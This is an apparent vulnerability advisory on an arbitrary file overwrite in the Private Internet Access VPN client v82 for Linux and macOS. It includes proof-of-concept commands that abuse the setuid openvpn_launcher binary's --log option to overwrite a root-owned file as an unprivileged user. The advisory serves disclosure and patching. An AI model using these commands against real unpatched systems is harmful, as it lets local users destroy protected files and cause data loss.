Allele Security Alert
Arbitrary File Overwrite
London Trust Media Private
Private Internet Access (PIA) VPN Client for Linux and macOS
Private Internet Access (PIA) VPN Client for Linux and macOS version v82
Private Internet Access (PIA) VPN Client for Linux and macOS v1.2.1 or later
Proof of concept
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux and macOS could allow an authenticated, local attacker to overwrite arbitrary files.
The PIA Linux and macOS openvpn_launcher binary is setuid root. This binary supports the –log option which accepts a path as an argument. The –log parameter is not sanitized which allows a local unprivileged to overwrite arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.
Steps to reproduce
Step 1 – Create a root owned test file. For this PoC /etc/test.txt is used.
# As root echo "this is a test" > /etc/test.txt chmod 600 /etc/test.txt
Step 2 – Overwrite the file using the –log option using a non privileged user.
# macOS /Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt # Linux /opt/pia/openvpn_launcher.64 --log /etc/test.txt
Step 3 – Verify the file contents have been overwritten
# As root cat /etc/test.txt
PIA Linux, macOS Arbitrary File Overwrite
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: June 25, 2019